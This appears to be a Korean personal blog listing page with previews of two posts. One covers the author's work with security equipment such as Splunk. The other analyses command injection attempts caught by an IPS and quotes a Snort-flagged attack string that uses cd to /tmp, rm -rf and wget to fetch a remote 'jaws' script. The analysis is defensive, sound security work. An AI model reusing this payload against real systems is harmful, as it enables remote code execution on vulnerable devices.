IT 관련8 일상처럼 써보는 경험 이야기 (정보보호) 장비에 대해 기회도 많이 접하고 다뤄본것도 많다고 생각하지만 세상은 넓어서 조금 더 발전해야 하는거 같다는 느낌은 언제나 받고 있음. 내가 많이 부족하기도 하고, IT쪽 업무를 하는 이상 최신 트렌드에는 매우 민감하게 반응해야 하는게 맞다고 생각한다. 누군가에게는 기회이기도 하고, 다른 누군가에게는 미래에 1도 도움이 안될 수 있는 내가 하는 업무에 대하여 나는 전반적으로 만족하는 편이다. 정보보호장비도 최신 트렌드에 맟춰서는 아니지만 남들보다 좋은 장비를 쉽게 접하고 써볼 수 있는 기회도 많을 뿐더러, 많은 장비를 다뤄보았다. 심심하니 한번 기술해보도록 하자~ 정보보호장비 : 1. SIEM(Splunk) : splunk라는 회사에서 만든 제품으로, 서버 및 정보보호장비에 대한 로그 연동으로 실시간으로 .. 2022. 9. 16. Commandline Injection Attack (명령어 삽입 공격) 22. 9. 5. 밤에 쓰는 이야기 최근 IPS에서 들어오는 취약점 공격으로 Snort 룰 : GET /shell cd/tmp rm -rf wget 0.0.0.0/jaws 공격이 많이 들어오고 있다. 해당 내용 분석결과 wget 커맨드 라인에 대한 공격으로 1. 시스템 명령어를 호출하는 어플리케이션의 인자 값을 조작하여 의도하지 않은 시스템 명령어를 실행시키는 공격 기법 2. 취약한 어플리케이션을 통하여 사용자의 명령어 시스템에서 임의적인 명령을 실행시키는 것을 목적으로 하는 공격 으로 설명이 될 수 있다. tmp 파일은 임시 파일로 현재 위에 공격방법은 tmp 디렉토리에 접근하여 악성 스크립트를 삽입하려는 시도로 매우 강하게 보인다. wget은 리눅스에서 파일을 다운받는 명령어로 wget [옵션]..... 2022. 9. 5. 이전 1 2 다음